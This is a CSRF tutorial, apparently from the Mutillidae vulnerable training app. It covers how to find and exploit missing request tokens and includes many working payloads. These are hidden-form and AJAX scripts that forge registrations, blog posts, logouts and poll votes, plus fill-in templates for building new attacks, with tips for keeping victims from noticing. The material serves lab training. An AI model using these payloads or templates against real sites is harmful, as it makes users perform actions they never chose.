Cross-site Request Forgery (CSRF)


Overview

Cross site request forgery may occcur when an attacker is able to run script into a users browser. To forge a legitimate request, the script creates and send the same parameters to the target website that would be sent if the user had submitted the legitimate form themselves. The target website knows the request has come from the users browser but cannot detect that the request was created and sent by a malicious script running in the users browser. As far as the target site can tell, the user submitted the request by using the web site in the expected way.

YouTubeVideo Tutorials

Discovery Methodology

Check the target website forms for enbedded tokens which when sent along with the other parameters on the form make each request unique. The token could be a random string, some form of CAPTCHA, random math problem, or other way to "sign" each form in order to be able to identify the form later. If these tokens exists, they provide a method by which the target website can detect a forged request (which would not contain the token issued by the target web site). If the tokens are missing, the request is likely vulnerable to cross site request forgery.

Exploitation

Submit the legitimate form and carefully note each parameter and value that must be sent for the server to process the request successfully. Either generate HTML or create a JavaScript that will send the same parameters to the same target site when the user triggers the "sending event". Next create a "sending event" which will cause the users browser to run the HTML or JavaScript that will send the request. The "sending event" can be as simple as a hidden form that is submitted when the user visits a page (onload), hovers over a particular object (onmouseover), or click on a certain area (onclick). The method used is not important as long as the parameters needed by the target site are submitted.

Note: If the target site requires authentication, the submission will only be successful if the user is still logged into the target site. There is no need they actually being viewing the site. They just need have a valid session token. The browser will send the session token automatically.

Examples

Virtually all pages are vulnerable although not all pages contain transactions and not all transactions are sensitive. Possibilities include adding a blog entry for the current user without them having to visit the "Add Blog" page or registering a new account of your choice by having the user visit an infected page.

Lets assume that adding a new user account to Mutillidae is a sensitive transaction. Using the registration process as an example, start by capturing a request. One way to capture a request is by using the Burp interception proxy. This tool is preloaded if using the Samurai Web Testing Framework or Backtrack. Register a new user account with Burp running and interception enabled.

Here is a sample request captured using Burp on Samurai:

POST /index.php?page=register.php HTTP/1.1 Host: mutillidae User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://mutillidae/index.php?page=register.php Cookie: PHPSESSID=1a28b85b825be0e5c9dc2789c63a3b44 Content-Type: application/x-www-form-urlencoded Content-Length: 122 username=username1&;password=pass1&confirm_password=pass1&my_signature=signature1&register-php-submit-button=Create+Account
Note the method, action, and input parameters. Use the CSRF template to create an HTML form injection that can send this request. Here is an example to create a user "sammy" with password "samurai".
<!--/* Be careful to escape single-quotes if inserting into MySQL. This example has the single quotes MySQL escaped (' -> \'). The try/catch is just to help you debug. This is not intended to be used when pen testing because if the exploit fails the user is going to be notified. */--> <form id="CSRF" method="POST" action="/index.php?page=register.php"> <input name="username" value="sammy" type="hidden" /> <input name="password" value="samurai" type="hidden" /> <input name="confirm_password" value="samurai" type="hidden" /> <input name="my_signature" value="The password is samurai" type="hidden" /> <input name="register-php-submit-button" value="Create+Account" type="hidden" /> </form> <span onmouseover="try{var lURL=document.location.href;document.getElementById(\'CSRF\').submit();document.location.href=lURL;}catch(e){alert(e.message);}">Hello World</span>
On the Add to your Blog page (http://mutillidae/index.php?page=add-to-your-blog.php), inject this exploit as a new blog. On either the Add Blog or the View Blog page, carefully mouseover the blog text and watch for the page to reload. Try to log in with the new user. Trap requests with an interception proxy like Burp to watch the actual request. Submit the request with XHR to get rid of that pesky page reload which could alert the user. When using XHR, use an interception proxy to watch the request and the response. Otherwise you wont notice.

Example: Force someone to add a blog - HTML Event Injection

<form id="f" action="index.php?page=add-to-your-blog.php" method="post" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="csrf-token" value="best-guess"/> <input type="hidden" name="blog_entry" value="Add this guy to the Wall of Sheep"/> <input type="hidden" name="add-to-your-blog-php-submit-button" value="TESTING"/> </form> <i onmouseover="window.document.getElementById(\'f\').submit()">Dancing with the stars results</i>

Example: Force someone to log out - HTML Event Injection

<i onmouseover="window.document.location=\'http://localhost/mutillidae/index.php?do=logout\'">How to improve your Facebook status</i>

Example: Force someone to add a blog - HTML injection

<script> var f = document.createElement("form"); f.method = "POST"; f.action = "./index.php?page=add-to-your-blog.php"; document.body.appendChild(f); var e = document.createElement("input"); e.setAttribute("type", "hidden"); e.setAttribute("name", "csrf-token"); e.setAttribute("value", "SecurityIsDisabled"); f.appendChild(e); var e = document.createElement("input"); e.setAttribute("type", "hidden"); e.setAttribute("name", "blog_entry"); e.setAttribute("value", "this is an auto message!"); f.appendChild(e); var e = document.createElement("input"); e.setAttribute("type", "hidden"); e.setAttribute("name", "add-to-your-blog-php-submit-button"); e.setAttribute("value", "Save Blog Entry"); f.appendChild(e); f.submit(); </script>

Example: Force someone to add a blog - AJAX

<script> var lXMLHTTP; try{ var lBlogEntry = encodeURI("BLOG_ENTRY_GOES_HERE"); var lData = "csrf-token=&blog_entry="+lBlogEntry+"&add-to-your-blog-php-submit-button=Save+Blog+Entry"; var lAction = "./index.php?page=add-to-your-blog.php"; var lMethod = "POST"; try { lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){ try { lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){ try{ lXMLHTTP = new XMLHttpRequest(); }catch(e){ alert(e.message); } } } lXMLHTTP.onreadystatechange = function(){ if(lXMLHTTP.readyState == 4){ alert("CSRF Complete"); } }; lXMLHTTP.open(lMethod, lAction, true); lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); lXMLHTTP.send(lData); }catch(e){ alert(e.message); } </script>

Example: Force someone to register an account - AJAX

<script> var lXMLHTTP; try{ var lUsername = "<USERNAME GOES HERE>"; var lPassword = "<PASSWORD GOES HERE>"; var lSignature = "<SIGNATURE GOES HERE>"; var lData = "username="+lUsername+"&password="+lPassword+"&confirm_password="+lPassword+"&my_signature="+lSignature+"&register-php-submit-button=Create+Account"; var lAction = "./index.php?page=register.php"; var lMethod = "POST"; try { lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){ try { lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){ try{ lXMLHTTP = new XMLHttpRequest(); }catch(e){ alert(e.message); } } } lXMLHTTP.onreadystatechange = function(){ if(lXMLHTTP.readyState == 4){ alert("CSRF Complete"); } }; lXMLHTTP.open(lMethod, lAction, true); lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); lXMLHTTP.send(lData); }catch(e){ alert(e.message); } </script>

Example: Force someone to vote for NMap - HTML injection

<script> function sendcsrf(){ var lForm = document.createElement("FORM"); lForm.action="http://mutillidae/index.php"; lForm.method = "GET"; lForm.enctype="application/x-www-form-urlencoded"; document.body.appendChild(lForm); var lPage = document.createElement("INPUT"); lPage.setAttribute("name", "page"); lPage.setAttribute("type", "hidden"); lPage.setAttribute("value", "user-poll.php"); lForm.appendChild(lPage); var lCSRFToken = document.createElement("INPUT"); lCSRFToken.setAttribute("name", "csrf-token"); lCSRFToken.setAttribute("type", "hidden"); lCSRFToken.setAttribute("value", ""); lForm.appendChild(lCSRFToken); var lChoice = document.createElement("INPUT"); lChoice.setAttribute("name", "choice"); lChoice.setAttribute("type", "hidden"); lChoice.setAttribute("value", "nmap"); lForm.appendChild(lChoice); var lInitials = document.createElement("INPUT"); lInitials.setAttribute("name", "initials"); lInitials.setAttribute("type", "hidden"); lInitials.setAttribute("value", "JD"); lForm.appendChild(lInitials); var lButton = document.createElement("INPUT"); lButton.setAttribute("name", "user-poll-php-submit-button"); lButton.setAttribute("type", "hidden"); lButton.setAttribute("value", "Submit Vote"); lForm.appendChild(lButton); lForm.submit(); } </script> <span onmouseover="sendcsrf();">Vote for nmap. I know you will.</span>

Example: Force someone to vote for NMap - AJAX

<script> var lXMLHTTP; try{ var lData = ""; var lAction = "./index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=CSRF&user-poll-php-submit-button=Submit+Vote"; var lMethod = "GET"; try { lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){ try { lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){ try{ lXMLHTTP = new XMLHttpRequest(); }catch(e){ alert(e.message); } } } lXMLHTTP.onreadystatechange = function(){ if(lXMLHTTP.readyState == 4){ alert("CSRF Complete"); } }; lXMLHTTP.open(lMethod, lAction, true); lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); lXMLHTTP.send(); }catch(e){ alert(e.message); } </script>

Appendix - CSRF Template - HTML Form

/* HTML Injection based CSRF template */ <form id="CSRFForm" method="$REQUEST-METHOD-HERE$" action="$SUBMIT-ACTION-PAGE-HERE$"> $FOR-EACH-REQUEST-INPUT-PARAMETER$ <input type="hidden" name="$PARAMETER-NAME$" value="$PARAMETER-VALUE$" /> $END-FOR$ </form> /* Now choose an event which when triggered will submit the form. Here are some examples */ <body onload='window.document.getElementById("CSRFForm").submit();'> <span onmouseover='window.document.getElementById("CSRFForm").submit();'>Hello World</span> /* JavaScript Injection based CSRF template */ /* NOTE: Script tags are only needed if injection is into HTML context. If injecting into JavaScript context, do not include script tags. */ <script> var lCSRFForm = window.document.createElement("form"); lCSRFForm.name="CSRFForm"; lCSRFForm.method="$REQUEST-METHOD-HERE$"; lCSRFForm.action="$SUBMIT-ACTION-PAGE-HERE$" $FOR-EACH-REQUEST-INPUT-PARAMETER$ var lInput = document.createElement("input"); lInput.type="hidden"; lInput.name="$PARAMETER-NAME$"; lInput.value="$PARAMETER-VALUE$"; lCSRFForm.appendChild(lInput); $END-FOR$ window.document.appendChild(lCSRFForm); lCSRFForm.submit(); </script>

Appendix - CSRF Template - AJAX

<script> var lXMLHTTP; try{ var lData = "$THE-ENTIRE-POST-PARAMETER-STRING-COPIED-FROM-REQUEST-OR-TYPED-IN$"; var lAction = "$SUBMIT-ACTION-PAGE-HERE$"; var lMethod = "$REQUEST-METHOD-HERE$"; try { lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP"); }catch (e) { try { lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP"); }catch (e) { try { lXMLHTTP = new XMLHttpRequest(); }catch (e) { alert(e.message); } } } lXMLHTTP.onreadystatechange = function(){ if(lXMLHTTP.readyState == 4){ alert("CSRF Complete"); } } ///////////////////////////// //UNCOMMENT FOR GET REQUESTS ///////////////////////////// //xmlhttp.open(lMethod, lAction, true); //lData=""; ///////////////////////////// ///////////////////////////// //UNCOMMENT FOR POST REQUESTS ///////////////////////////// lXMLHTTP.open(lMethod, lAction, true); lXMLHTTP.setRequestHeader("Method", "POST " + lAction + " HTTP/1.1"); lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); lXMLHTTP.send(lData); }catch(e){ alert(e.message); } </script>

Videos


YouTubeCross-Site Scripting Explained - Part 1: The Basics
YouTubeCross-Site Scripting Explained - Part 2: DOM-Based XSS
YouTubeCross-Site Scripting Explained - Part 3: Reflected XSS
YouTubeCross-Site Scripting Explained - Part 4: Stored XSS
YouTubeCross-Site Request Forgery Explained - Part 1: Basic CSRF
YouTubeCross-Site Request Forgery Explained - Part 2: Advanced CSRF